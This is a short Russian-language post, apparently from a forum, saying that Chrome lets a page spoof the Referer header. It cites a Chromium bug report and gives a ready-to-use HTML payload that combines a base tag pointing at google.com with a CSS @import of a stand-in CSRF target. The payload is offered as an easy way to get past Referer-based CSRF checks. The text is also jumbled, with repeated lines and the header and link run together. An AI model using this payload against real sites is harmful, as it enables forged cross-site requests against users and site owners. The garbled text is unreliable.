Оказалось, что в Chrome можно подделать заголовок Referer.
Юзать очень просто
Запрос к сайту уйдет с заголовком
инфа тут https://bugs.chromium.org/p/chromium/issues/detail?id=1152999
Юзать очень просто
Код:
<base href="https://www.google.com/">
<style>
@import 'https://CSRF.vulnerable.example/';
</style>Referer: https://www.google.com/инфа тут https://bugs.chromium.org/p/chromium/issues/detail?id=1152999